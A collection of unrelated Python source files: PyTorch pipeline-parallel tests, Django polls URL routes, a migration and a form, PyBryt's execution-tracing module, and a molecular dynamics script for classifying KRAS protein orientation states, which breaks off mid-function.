@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_deferred_batch_norm(checkpoint, setup_rpc):
bn = nn.BatchNorm2d(3)
pipe_bn = deepcopy(bn)
pipe = Pipe(
nn.Sequential(pipe_bn), chunks=2, checkpoint=checkpoint, deferred_batch_norm=True
)
x = torch.rand(4, 3, 10, 10)
pipe(x).local_value().mean().backward()
bn(x).mean().backward()
assert torch.allclose(pipe[0].running_mean, bn.running_mean, atol=1e-4)
assert torch.allclose(pipe[0].running_var, bn.running_var, atol=1e-4)
@pytest.mark.parametrize("checkpoint", ["never", "always"])
def test_deferred_batch_norm_params(checkpoint, setup_rpc):
bn = nn.BatchNorm2d(3)
pipe_bn = deepcopy(bn)
pipe = Pipe(
nn.Sequential(pipe_bn), chunks=1, checkpoint=checkpoint, deferred_batch_norm=True
)
x = torch.rand(4, 3, 10, 10)
pipe(x).local_value().mean().backward()
bn(x).mean().backward()
assert pipe[0].weight.grad is not None
assert pipe[0].bias.grad is not None
assert torch.allclose(pipe[0].weight.grad, bn.weight.grad, atol=1e-4)
assert torch.allclose(pipe[0].bias.grad, bn.bias.grad, atol=1e-4)
def test_devices(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
c = nn.Linear(1, 1)
# There are extra two devices.
model = nn.Sequential(a, b, c)
model = Pipe(model)
cpu = torch.device("cpu")
# Extra devices must be discarded.
assert model.devices == [cpu, cpu, cpu]
def test_partitions(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
assert isinstance(model.partitions, nn.ModuleList)
assert isinstance(model.partitions[0], nn.Sequential)
assert isinstance(model.partitions[1], nn.Sequential)
assert "partitions.0.0.weight" in model.state_dict()
@pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_merged_partitions(setup_rpc):
a = nn.Linear(1, 1).to(0)
b = nn.Sequential(nn.Linear(1, 1), nn.Linear(1, 2)).to(0)
c = nn.Linear(1, 1)
d = nn.Linear(1, 2)
model = nn.Sequential(a, b, c, d)
model = Pipe(model)
assert isinstance(model.partitions, nn.ModuleList)
assert isinstance(model.partitions[0], PipeSequential)
assert isinstance(model.partitions[1], PipeSequential)
assert list(model.partitions[0]) == [a, b[0], b[1]]
assert list(model.partitions[1]) == [c]
assert list(model.partitions[2]) == [d]
def test_deny_moving(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
# Moving is denied.
with pytest.raises(TypeError):
model.cuda()
with pytest.raises(TypeError):
model.cpu()
with pytest.raises(TypeError):
model.to(torch.device("cuda"))
with pytest.raises(TypeError):
model.to(0)
with pytest.raises(TypeError):
model.to("cuda")
with pytest.raises(TypeError):
model.to(device=0)
with pytest.raises(TypeError):
model.to(torch.rand(1))
with pytest.raises(TypeError):
model.to(tensor=torch.rand(1))
# Casting is allowed.
model.half()
model.to(torch.double)
model.to(dtype=torch.float)
def test_empty_module(setup_rpc):
# Empty sequential module is not illegal.
model = nn.Sequential()
model = Pipe(model)
assert model(torch.tensor(42)).local_value() == torch.tensor(42)
# But only tensor or tensors is legal in Pipe.
with pytest.raises(TypeError):
model(42)
def test_named_children(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(OrderedDict([("a", a), ("b", b)]))
model = Pipe(model)
names = set(n for n, _ in model.named_modules())
assert "partitions.0.0" in names
assert "partitions.1.0" in names
# Pipe doesn't support __getattr__. Unlike nn.Sequential, Pipe requires
# several methods in its namespace.
with pytest.raises(AttributeError):
model.a
def test_verify_module_non_sequential(setup_rpc):
with pytest.raises(TypeError, match="module must be nn.Sequential to be partitioned"):
Pipe(nn.Module())
def test_verify_module_duplicate_children(setup_rpc):
conv = nn.Conv2d(3, 3, 1)
model = nn.Sequential(conv, conv)
with pytest.raises(ValueError, match="module with duplicate children is not supported"):
Pipe(model)
@skip_if_no_cuda
def test_verify_module_params_on_same_device(setup_rpc):
class Surrogate(nn.Module):
def __init__(self, param1, param2):
super().__init__()
self.param1 = param1
self.param2 = param2
conv1 = nn.Conv2d(3, 3, 1)
conv2 = nn.Conv2d(3, 3, 1)
model = nn.Sequential(Surrogate(conv1, conv2.cuda()))
with pytest.raises(
ValueError,
match=r'should have all parameters on a single device, please use .to\(\)'
' to place the module on a single device'):
Pipe(model)
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_verify_nested_modules(setup_rpc):
model = nn.Sequential(
nn.Sequential(
nn.Linear(32, 16).cuda(0),
nn.Linear(16, 8).cuda(0)
),
nn.Sequential(
nn.Linear(8, 4).cuda(1),
nn.Linear(4, 2).cuda(1)
),
)
pipe = Pipe(model)
out = pipe(torch.rand(10, 32).cuda(0))
assert out.local_value().device == torch.device("cuda:1")
assert out.local_value().size() == torch.Size([10, 2])
def test_verify_module_duplicate_parameters_on_same_device(setup_rpc):
class Surrogate(nn.Module):
def __init__(self, module):
super().__init__()
self.module = module
conv = nn.Conv2d(3, 3, 1)
model = nn.Sequential(Surrogate(conv), Surrogate(conv))
Pipe(model)
def test_forward_lockstep(setup_rpc):
timeline = []
class DelayedLog(nn.Module):
def __init__(self, j, seconds):
super().__init__()
self.i = 0
self.j = j
self.seconds = seconds
def forward(self, x):
time.sleep(self.seconds)
timeline.append((self.i, self.j))
self.i += 1
return x
model = nn.Sequential(DelayedLog(0, seconds=0), DelayedLog(1, seconds=0.1))
model = Pipe(model, chunks=3)
model(torch.rand(3, 1))
# Expected timeline: (Logs are recorded at !)
#
# Partition #0: 0! 1! 2!
# Partition #1: 000! 111! 222!
#
assert timeline == [(0, 0), (1, 0), (0, 1), (2, 0), (1, 1), (2, 1)]
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
@skip_if_no_cuda
def test_multiple_inputs(checkpoint, setup_rpc):
class Module1(nn.Module):
def forward(self, a, b, c):
return a + b + c, a * b * c
class Module2(nn.Module):
def forward(self, a, b):
return a + b
model = Pipe(nn.Sequential(Module1().cuda(0), Module2().cuda(0)), chunks=2, checkpoint=checkpoint)
t = torch.rand(10)
res = model(t, t, t).local_value()
assert torch.equal(res, (t + t + t) + (t * t * t))
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_inputs_wrong_device(setup_rpc):
class Module1(nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(5))
def forward(self, a, b):
return a + b + self.param, b
# Start inputs on wrong device and ensure Pipe moves them correctly.
a = torch.rand(10).cuda(1)
b = torch.rand(10).cuda(1)
model = Pipe(nn.Sequential(Module1().cuda(0), Module1().cuda(1)), chunks=2)
with pytest.raises(ValueError, match='All inputs should be on the same device as the first partition'):
model(a, b)
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_with_device_wrapper(setup_rpc):
fc1 = nn.Linear(16, 8).cuda(0)
fc2 = nn.Linear(8, 4).cuda(1)
dropout = nn.Dropout()
model = nn.Sequential(fc1, fc2, WithDevice(dropout, 'cuda:1'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:1') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0'), torch.device('cuda:1')] == model.devices
model = nn.Sequential(fc1, WithDevice(dropout, 'cuda:1'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:1') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0'), torch.device('cuda:1')] == model.devices
model = nn.Sequential(fc1, WithDevice(fc2, 'cuda:0'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:0') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0')] == model.devices
assert torch.device('cuda:0') == fc2.weight.device
|
StarcoderdataPython
|
1618290
|
from django.urls import path
from . import views
from . import apiviews
app_name = 'polls'
urlpatterns = [
path('', views.IndexView.as_view(), name='index'),
path('<int:pk>/', views.DetailView.as_view(), name='detail'),
path('<int:pk>/results/', views.ResultsView.as_view(), name='results'),
path('<int:question_id>/vote/', views.vote, name='vote'),
path('api/questions/', apiviews.QuestionList.as_view(), name='question_list'),
path('api/questions/<int:pk>/', apiviews.QuestionDetail.as_view(), name='question_detail'),
path('api/choices/', apiviews.ChoiceList.as_view(), name='choice_list'),
path('api/choices/<int:pk>/', apiviews.ChoiceDetail.as_view(), name='choice_detail'),
]
|
StarcoderdataPython
|
3233398
|
# Generated by Django 3.2.8 on 2022-01-29 13:18
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Organisatie',
fields=[
('nummer', models.IntegerField(primary_key=True, serialize=False, unique=True, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
('naam', models.CharField(max_length=30, unique=True)),
],
options={
'ordering': ['-naam'],
},
),
]
|
StarcoderdataPython
|
164704
|
<reponame>JoshZero87/site<filename>contacts/forms.py<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
class PhoneOptOutUploadForm(forms.Form):
csv_file = forms.FileField()
|
StarcoderdataPython
|
4806332
|
"""Tracing function and controls"""
import inspect
import linecache
import re
from copy import copy
from types import FrameType, FunctionType, ModuleType
from typing import Any, Dict, List, Optional, Tuple, Callable
from .complexity import is_complexity_tracing_enabled
from .memory_footprint import MemoryFootprint
from .utils import is_ipython_frame
from ..utils import make_secret, pickle_and_hash, UnpicklableError
ACTIVE_FOOTPRINT = None
TRACING_FUNC = None
TRACING_VARNAME = "__PYBRYT_TRACING__"
def create_collector(
skip_types: List[type] = [type, type(len), FunctionType],
addl_filenames: List[str] = [],
) -> Tuple[MemoryFootprint, Callable[[FrameType, str, Any], Callable]]:
"""
Creates a memory footprint to collect observed values and a trace function.
Any types in ``skip_types`` won't be tracked by the trace function. The trace function by
default only traces inside IPython but can be set to trace inside specific files using the
``addl_filenames`` argument, which should be a list absolute paths to files that should also be
traced inside of.
Args:
skip_types (``list[type]``, optional): object types not to track
addl_filenames (``list[str]``, optional): filenames to trace inside of in addition to
IPython
Returns:
``tuple[MemoryFootprint, callable[[frame, str, object], callable]]``: the memory footprint
and the trace function
"""
global ACTIVE_FOOTPRINT
vars_not_found = {}
footprint = MemoryFootprint()
def track_value(val, seen_at=None):
"""
Tracks a value in ``footprint``. Checks that the value has not already been tracked by
pickling it and hashing the pickled object and comparing it to ``hashes``. If pickling is
unsuccessful, the value is not tracked.
Args:
val (``object``): the object to be tracked
seen_at (``int``, optional): an overriding step counter value
"""
try:
if hasattr(val, "__module__"):
footprint.add_imports(val.__module__.split(".")[0])
if type(val) in skip_types:
return
if isinstance(val, ModuleType):
footprint.add_imports(val.__name__.split(".")[0])
return
footprint.add_value(copy(val), seen_at)
# if something fails, don't track
except:
return
def track_call(frame):
"""
Tracks a call in ``calls`` as a tuple of ``(filename, function name)``.
Args:
frame (``types.FrameType``): the frame of the call
"""
footprint.add_call(frame.f_code.co_filename, frame.f_code.co_name)
# TODO: a way to track the cell of execution
def collect_intermidiate_results(frame: FrameType, event: str, arg: Any):
"""
Trace function for PyBryt.
"""
if is_ipython_frame(frame) or frame.f_code.co_filename in addl_filenames:
footprint.increment_counter() # increment student code step counter
if event == "call":
track_call(frame)
return collect_intermidiate_results
# return if tracking is disabled by a compelxity check
if is_complexity_tracing_enabled():
return collect_intermidiate_results
name = frame.f_code.co_filename + frame.f_code.co_name
if is_ipython_frame(frame) or frame.f_code.co_filename in addl_filenames:
if event == "line" or event == "return":
line = linecache.getline(frame.f_code.co_filename, frame.f_lineno)
tokens = set("".join(char if char.isalnum() or char == '_' else "\n" for char in line).split("\n"))
for t in "".join(char if char.isalnum() or char == '_' or char == '.' else "\n" for char in line).split("\n"):
tokens.add(t)
tokens = sorted(tokens) # sort for stable ordering
for t in tokens:
if "." in t:
try:
float(t) # prevent adding floats prematurely
continue
except ValueError:
pass
try:
val = eval(t, frame.f_globals, frame.f_locals)
track_value(val)
except:
pass
else:
if t in frame.f_locals:
val = frame.f_locals[t]
track_value(val)
elif t in frame.f_globals:
val = frame.f_globals[t]
track_value(val)
# for tracking the results of an assignment statement
m = re.match(r"^\s*(\w+)(\[[^\]]\]|(\.\w+)+)*\s=.*", line)
if m:
if name not in vars_not_found:
vars_not_found[name] = []
vars_not_found[name].append((m.group(1), footprint.counter.get_value()))
if event == "return":
track_value(arg)
elif (is_ipython_frame(frame) or frame.f_back.f_code.co_filename in addl_filenames) and \
event == "return":
track_value(arg)
if event == "return" and name in vars_not_found:
varnames = vars_not_found.pop(name)
for t, step in varnames:
if t in frame.f_locals:
val = frame.f_locals[t]
track_value(val, step)
elif t in frame.f_globals:
val = frame.f_globals[t]
track_value(val, step)
return collect_intermidiate_results
ACTIVE_FOOTPRINT = footprint
return footprint, collect_intermidiate_results
def get_tracing_frame():
"""
Returns the frame that is being traced by looking for the ``__PYBRYT_TRACING__`` global variable.
Returns:
the frame being traced or ``None`` of no tracing is occurring
"""
frame = inspect.currentframe()
while frame is not None:
if TRACING_VARNAME in frame.f_globals and frame.f_globals[TRACING_VARNAME]:
return frame
frame = frame.f_back
return None
def tracing_off(frame=None, save_func=True):
"""
Turns off PyBryt's tracing if tracing is occurring in this call stack. If PyBryt is not tracing,
takes no action.
This method can be used in students' notebooks to include code that shouldn't be traced as part
of the submission, e.g. demo code or ungraded code. In the example below, the call that creates
``x2`` is traced but the one to create ``x3`` is not.
.. code-block:: python
def pow(x, a):
return x ** a
x2 = pow(x, 2)
pybryt.tracing_off()
x3 = pow(x, 3)
"""
global TRACING_FUNC
frame = get_tracing_frame() if frame is None else frame
if frame is None:
return
if save_func:
TRACING_FUNC = frame.f_trace
vn = f"sys_{make_secret()}"
exec(f"import sys as {vn}\n{vn}.settrace(None)", frame.f_globals, frame.f_locals)
def tracing_on(frame=None, tracing_func=None):
"""
Turns tracing on if PyBryt was tracing the call stack. If PyBryt is not tracing or
:py:meth:`tracing_off<pybryt.tracing_off>` has not been called, no action is taken.
This method can be used in students' notebooks to turn tracing back on after deactivating tracing
for ungraded code In the example below, ``x4`` is traced because ``tracing_on`` is used after
``tracing_off`` and the creation of ``x3``.
.. code-block:: python
def pow(x, a):
return x ** a
x2 = pow(x, 2)
pybryt.tracing_off()
x3 = pow(x, 3)
pybryt.tracing_on()
x4 = pow(x, 4)
"""
global TRACING_FUNC
frame = get_tracing_frame() if frame is None else frame
if frame is None or (TRACING_FUNC is None and tracing_func is None):
return
if TRACING_FUNC is not None and tracing_func is None:
tracing_func = TRACING_FUNC
vn = f"cir_{make_secret()}"
vn2 = f"sys_{make_secret()}"
frame.f_globals[vn] = tracing_func
exec(f"import sys as {vn2}\n{vn2}.settrace({vn})", frame.f_globals, frame.f_locals)
frame.f_trace = tracing_func
class no_tracing:
"""
A context manager for turning tracing off for a block of code in a submission.
If PyBryt is tracing code, any code inside this context will not be traced for values in memory.
If PyBryt is not tracing, no action is taken.
.. code-block:: python
with pybryt.no_tracing():
# this code is not traced
foo(1)
# this code is traced
foo(2)
"""
def __enter__(self):
tracing_off()
def __exit__(self, exc_type, exc_value, traceback):
tracing_on()
return False
class FrameTracer:
"""
A class for managing the tracing of a call stack.
Args:
frame (``FrameType``): the frame to initialize tracing in
"""
footprint: Optional[MemoryFootprint]
"""the memory footprint being populated"""
frame: FrameType
"""the frame being traced"""
_tracing_already_enabled: bool
"""whether tracing was already enabled when ``start_trace`` was called"""
def __init__(self, frame: FrameType) -> None:
self.frame = frame
self.footprint = None
self._tracing_already_enabled = False
def start_trace(self, **kwargs) -> None:
"""
Create a collector and memory footprint and start tracing execution in the frame. Returns
a boolean indicating whether tracing was enabled.
Args:
**kwargs: additional keyword arguments passed to ``create_collector``
Returns:
``bool``: whether this call initiated tracing (``False`` if tracing was already enabled)
"""
self._tracing_already_enabled = get_tracing_frame() is not None
if self._tracing_already_enabled:
self.footprint = get_active_footprint()
return False
self.footprint, cir = create_collector(**kwargs)
self.frame.f_globals[TRACING_VARNAME] = True
tracing_on(tracing_func=cir)
return True
def end_trace(self) -> None:
"""
End execution tracing in the frame.
"""
if not self._tracing_already_enabled:
tracing_off(save_func=False)
self.frame.f_globals[TRACING_VARNAME] = False
def get_footprint(self) -> MemoryFootprint:
"""
Return the memory footprint that was populated by the trace function.
Returns:
:py:class:`pybryt.execution.memory_footprint.MemoryFootprint`: the memory footprint
"""
return self.footprint
def get_active_footprint() -> Optional[MemoryFootprint]:
"""
Get the active memory footprint if present, else ``None``.
Returns:
:py:class:`pybryt.execution.memory_footprint.MemoryFootprint`: the memory footprint
"""
return ACTIVE_FOOTPRINT
|
StarcoderdataPython
|
896
|
###############################################################################
# @todo add Pilot2-splash-app disclaimer
###############################################################################
""" Get's KRAS states """
import MDAnalysis as mda
from MDAnalysis.analysis import align
from MDAnalysis.lib.mdamath import make_whole
import os
import numpy as np
import math
############## Below section needs to be uncommented ############
import mummi_core
import mummi_ras
from mummi_core.utils import Naming
# # Logger has to be initialized the first thing in the script
from logging import getLogger
LOGGER = getLogger(__name__)
# # Innitilize MuMMI if it has not been done before
# MUMMI_ROOT = mummi.init(True)
# This is needed so the Naming works below
#@TODO fix this so we don't have these on import make them as an init
mummi_core.init()
dirKRASStates = Naming.dir_res('states')
dirKRASStructures = Naming.dir_res('structures')
# #RAS_ONLY_macrostate = np.loadtxt(os.path.join(dirKRASStates, "RAS-ONLY.microstates.txt"))
RAS_ONLY_macrostate = np.loadtxt(os.path.join(dirKRASStates, "ras-states.txt"),comments='#')
# #RAS_RAF_macrostate = np.loadtxt(os.path.join(dirKRASStates, "RAS-RAF.microstates.txt"))
RAS_RAF_macrostate = np.loadtxt(os.path.join(dirKRASStates, "ras-raf-states.txt"),comments='#') # Note diffrent number of columns so index change below
# TODO: CS, my edits to test
# RAS_ONLY_macrostate = np.loadtxt('ras-states.txt')
# RAS_RAF_macrostate = np.loadtxt('ras-raf-states.txt')
############## above section needs to be uncommented ############
# TODO: CS, my edits to test
# TODO: TSC, The reference structure has to currently be set as the 'RAS-ONLY-reference-structure.gro'
# TODO: TSC, path to the reference structure is: mummi_resources/structures/
kras_ref_universe = mda.Universe(os.path.join(dirKRASStructures, "RAS-ONLY-reference-structure.gro"))
# kras_ref_universe = mda.Universe("RAS-ONLY-reference-structure.gro")
# kras_ref_universe = mda.Universe('AA_pfpatch_000000004641_RAS_RAF2_411.gro')
# TODO: CS, not using these for x4 proteins; instead using protein_systems below to set num_res
######### Below hard codes the number of residues within RAS-only and RAS-RAF ##########
RAS_only_num_res = 184
RAS_RAF_num_res = 320
######### Above hard codes the number of residues within RAS-only and RAS-RAF ##########
####### This can be removed
# def get_kras(syst, kras_start):
# """Gets all atoms for a KRAS protein starting at 'kras_start'."""
# return syst.atoms[kras_start:kras_start+428]
####### This can be removed
def get_segids(u):
"""Identifies the list of segments within the system. Only needs to be called x1 time"""
segs = u.segments
segs = segs.segids
ras_segids = []
rasraf_segids = []
for i in range(len(segs)):
# print(segs[i])
if segs[i][-3:] == 'RAS':
ras_segids.append(segs[i])
if segs[i][-3:] == 'RAF':
rasraf_segids.append(segs[i])
return ras_segids, rasraf_segids
def get_protein_info(u,tag):
"""Uses the segments identified in get_segids to make a list of all proteins in the systems.\
Outputs a list of the first residue number of the protein, and whether it is 'RAS-ONLY', or 'RAS-RAF'.\
The 'tag' input defines what is used to identify the first residue of the protein. i.e. 'resname ACE1 and name BB'.\
Only needs to be called x1 time"""
ras_segids, rasraf_segids = get_segids(u)
if len(ras_segids) > 0:
RAS = u.select_atoms('segid '+ras_segids[0]+' and '+str(tag))
else:
RAS = []
if len(rasraf_segids) > 0:
RAF = u.select_atoms('segid '+rasraf_segids[0]+' and '+str(tag))
else:
RAF = []
protein_info = []#np.empty([len(RAS)+len(RAF),2])
for i in range(len(RAS)):
protein_info.append((RAS[i].resid,'RAS-ONLY'))
for i in range(len(RAF)):
protein_info.append((RAF[i].resid,'RAS-RAF'))
######## sort protein info
protein_info = sorted(protein_info)
######## sort protein info
return protein_info
def get_ref_kras():
"""Gets the reference KRAS struct. Only called x1 time when class is loaded"""
start_of_g_ref = kras_ref_universe.residues[0].resid
ref_selection = 'resid '+str(start_of_g_ref)+':'+str(start_of_g_ref+24)+' ' +\
str(start_of_g_ref+38)+':'+str(start_of_g_ref+54)+' ' +\
str(start_of_g_ref+67)+':'+str(start_of_g_ref+164)+' ' +\
'and (name CA or name BB)'
r2_26r40_56r69_166_ref = kras_ref_universe.select_atoms(str(ref_selection))
return kras_ref_universe.select_atoms(str(ref_selection)).positions - kras_ref_universe.select_atoms(str(ref_selection)).center_of_mass()
# Load inital ref frames (only need to do this once)
ref0 = get_ref_kras()
def getKRASstates(u,kras_indices):
"""Gets states for all KRAS proteins in path."""
# res_shift = 8
# all_glycine = u.select_atoms("resname GLY")
# kras_indices = []
# for i in range(0, len(all_glycine), 26):
# kras_indices.append(all_glycine[i].index)
########## Below is taken out of the function so it is only done once #########
# kras_indices = get_protein_info(u,'resname ACE1 and name BB')
########## Above is taken out of the function so it is only done once #########
# CS, for x4 cases:
# [{protein_x4: (protein_type, num_res)}]
protein_systems = [{'ras4a': ('RAS-ONLY', 185),
'ras4araf': ('RAS-RAF', 321),
'ras': ('RAS-ONLY', 184),
'rasraf': ('RAS-RAF', 320)}]
ALLOUT = []
for k in range(len(kras_indices)):
start_of_g = kras_indices[k][0]
protein_x4 = str(kras_indices[k][1])
try:
protein_type = [item[protein_x4] for item in protein_systems][0][0] # 'RAS-ONLY' OR 'RAS-RAF'
num_res = [item[protein_x4] for item in protein_systems][0][1]
except:
LOGGER.error('Check KRas naming between modules')
raise Exception('Error: unknown KRas name')
# TODO: CS, replacing this comment section with the above, to handle x4 protein types
# ---------------------------------------
# ALLOUT = []
# for k in range(len(kras_indices)):
# start_of_g = kras_indices[k][0]
# protein_type = str(kras_indices[k][1])
# ########## BELOW SECTION TO DETERMINE WHICH RESIDUES ARE PART OF THE PROTEIN GROUP - NEEDED FOR PBC REMOVAL ##############
# ########## POTENTIALLY REDO WITH A 'HARD-CODED' NUMBER OF RESIDUES PER PROTEIN GROUP (WHETHER RAS-ONLY OR RAS-RAF) #######
# ########## HAS BEEN REDONE WITH A 'HARD-CODED' NUMBER OF RESIDUES PER PROTEIN GROUP (WHETHER RAS-ONLY OR RAS-RAF) ########
# # if len(kras_indices) == 1:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(len(u.residues))+' and name BB') ####### HAS TO BE FIXED FOR BACKBONE ATOMS FOR SPECIFIC PROTEIN
# # elif len(kras_indices) > 1:
# # if k == len(kras_indices)-1:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(len(u.residues))+' and name BB')
# # else:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(kras_indices[k+1][0])+' and name BB')
# ########## ABOVE SECTION TO DETERMINE WHICH RESIDUES ARE PART OF THE PROTEIN GROUP - NEEDED FOR PBC REMOVAL ##############
#
# ########## Below hard codes the number of residues/beads in the RAS-ONLY and RAS-RAF simulations #########################
# if protein_type == 'RAS-ONLY':
# num_res = RAS_only_num_res
# elif protein_type == 'RAS-RAF':
# num_res = RAS_RAF_num_res
# ########## Above hard codes the number of residues/beads in the RAS-ONLY and RAS-RAF simulations #########################
# ---------------------------------------
# TODO: TSC, I changed the selection below, which can be used for the make_whole...
# krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+num_res)+' and (name CA or name BB)')
krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+num_res))
krases0_BB.guess_bonds()
r2_26r40_56r69_166 = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+24)+' ' +\
str(start_of_g+38)+':'+str(start_of_g+54)+' ' +\
str(start_of_g+67)+':'+str(start_of_g+164)+\
' and (name CA or name BB)')
u_selection = \
'resid '+str(start_of_g)+':'+str(start_of_g+24)+' '+str(start_of_g+38)+':'+str(start_of_g+54)+' ' +\
str(start_of_g+67)+':'+str(start_of_g+164)+' and (name CA or name BB)'
mobile0 = u.select_atoms(str(u_selection)).positions - u.select_atoms(str(u_selection)).center_of_mass()
# TODO: CS, something wrong with ref0 from get_kras_ref()
# just making ref0 = mobile0 to test for now
# ref0 = mobile0
# TSC removed this
R, RMSD_junk = align.rotation_matrix(mobile0, ref0)
######## TODO: TSC, Adjusted for AA lipid names ########
# lipids = u.select_atoms('resname POPX POPC PAPC POPE DIPE DPSM PAPS PAP6 CHOL')
lipids = u.select_atoms('resname POPC PAPC POPE DIPE SSM PAPS SAPI CHL1')
coords = ref0
RotMat = []
OS = []
r152_165 = krases0_BB.select_atoms('resid '+str(start_of_g+150)+':'+str(start_of_g+163)+' and (name CA or name BB)')
r65_74 = krases0_BB.select_atoms('resid '+str(start_of_g+63)+':'+str(start_of_g+72)+' and (name CA or name BB)')
timeframes = []
# TODO: CS, for AA need bonds to run make_whole()
# krases0_BB.guess_bonds()
# TODO: CS, turn off for now to test beyond this point
''' *** for AA, need to bring that back on once all else runs ***
'''
# @Tim and <NAME>. this was commented out - please check.
#make_whole(krases0_BB)
j, rmsd_junk = mda.analysis.align.rotation_matrix((r2_26r40_56r69_166.positions-r2_26r40_56r69_166.center_of_mass()), coords)
RotMat.append(j)
OS.append(r65_74.center_of_mass()-r152_165.center_of_mass())
timeframes.append(u.trajectory.time)
if protein_type == 'RAS-RAF':
z_pos = []
############### NEED TO CONFIRM THE SELECTION OF THE RAF LOOP RESIDUES BELOW ####################
############### TODO: TSC, zshifting is set to -1 (instead of -2), as there are ACE caps that are separate residues in AA
#zshifting=-1
if protein_x4 == 'rasraf':
zshifting = -1
elif protein_x4 == 'ras4araf':
zshifting = 0
else:
zshifting = 0
LOGGER.error('Found unsupported protein_x4 type')
raf_loops_selection = u.select_atoms('resid '+str(start_of_g+zshifting+291)+':'+str(start_of_g+zshifting+294)+' ' +\
str(start_of_g+zshifting+278)+':'+str(start_of_g+zshifting+281)+' ' +\
' and (name CA or name BB)')
############### NEED TO CONFIRM THE SELECTION OF THE RAF LOOP RESIDUES ABOVE ####################
diff = (lipids.center_of_mass()[2]-raf_loops_selection.center_of_mass(unwrap=True)[2])/10
if diff < 0:
diff = diff+(u.dimensions[2]/10)
z_pos.append(diff)
z_pos = np.array(z_pos)
RotMatNP = np.array(RotMat)
OS = np.array(OS)
OA = RotMatNP[:, 2, :]/(((RotMatNP[:, 2, 0]**2)+(RotMatNP[:, 2, 1]**2)+(RotMatNP[:, 2, 2]**2))**0.5)[:, None]
OWAS = np.arccos(RotMatNP[:, 2, 2])*180/math.pi
OC_temp = np.concatenate((OA, OS), axis=1)
t = ((OC_temp[:, 0]*OC_temp[:, 3])+(OC_temp[:, 1]*OC_temp[:, 4]) +
(OC_temp[:, 2]*OC_temp[:, 5]))/((OC_temp[:, 0]**2)+(OC_temp[:, 1]**2)+(OC_temp[:, 2]**2))
OC = OA*t[:, None]
ORS_tp = np.concatenate((OC, OS), axis=1)
ORS_norm = (((ORS_tp[:, 3]-ORS_tp[:, 0])**2)+((ORS_tp[:, 4]-ORS_tp[:, 1])**2)+((ORS_tp[:, 5]-ORS_tp[:, 2])**2))**0.5
ORS = (OS - OC)/ORS_norm[:, None]
OACRS = np.cross(OA, ORS)
OZCA = OA * OA[:, 2][:, None]
Z_unit = np.full([len(OZCA), 3], 1)
Z_adjust = np.array([0, 0, 1])
Z_unit = Z_unit*Z_adjust
Z_OZCA = Z_unit-OZCA
OZPACB = Z_OZCA/((Z_OZCA[:, 0]**2+Z_OZCA[:, 1]**2+Z_OZCA[:, 2]**2)**0.5)[:, None]
OROTNOTSIGNED = np.zeros([len(ORS)])
for i in range(len(ORS)):
OROTNOTSIGNED[i] = np.arccos(np.dot(OZPACB[i, :], ORS[i, :]) /
(np.sqrt(np.dot(OZPACB[i, :], OZPACB[i, :]))) *
(np.sqrt(np.dot(ORS[i, :], ORS[i, :]))))*180/math.pi
OZPACBCRS_cross = np.cross(OZPACB, ORS)
OZPACBCRS = OZPACBCRS_cross/((OZPACBCRS_cross[:, 0]**2+OZPACBCRS_cross[:, 1]**2+OZPACBCRS_cross[:, 2]**2)**0.5)[:, None]
OFORSIGN_temp = (OA - OZPACBCRS)**2
OFORSIGN = OFORSIGN_temp[:, 0]+OFORSIGN_temp[:, 1]+OFORSIGN_temp[:, 2]
OROT = OROTNOTSIGNED
for i in range(len(OROT)):
if OROT[i] < 0:
OROT[i] = -(OROT[i])
for i in range(len(OROT)):
if OFORSIGN[i] < 0.25:
OROT[i] = -(OROT[i])
###### Below introduces new shift to account for upper vs. lower leaflet #####
for i in range(len(OWAS)):
OWAS[i] = abs(-(OWAS[i])+180) # made this an absolute value so that the tilt remains positive
for i in range(len(OROT)):
if OROT[i] < 0:
OROT[i] = OROT[i]+180
elif OROT[i] > 0:
OROT[i] = OROT[i]-180
###### Above introduces new shift to account for upper vs. lower leaflet #####
###### Below might have to be updated to take into account the periodic nature of the rotation ######
if protein_type == 'RAS-ONLY':
states = np.zeros(len(OROT))
for j in range(len(OROT)):
diff0 = []
for i in range(len(RAS_ONLY_macrostate)):
#diff0.append([((RAS_ONLY_macrostate[i,0]-OWAS[j])**2+(RAS_ONLY_macrostate[i,1]-OROT[j])**2)**0.5, RAS_ONLY_macrostate[i,6]])
diff0.append([((RAS_ONLY_macrostate[i,1]-OWAS[j])**2+(RAS_ONLY_macrostate[i,0]-OROT[j])**2)**0.5, RAS_ONLY_macrostate[i,5]])
diff0.sort()
states[j] = diff0[0][1]
elif protein_type == 'RAS-RAF':
states = np.zeros(len(OROT))
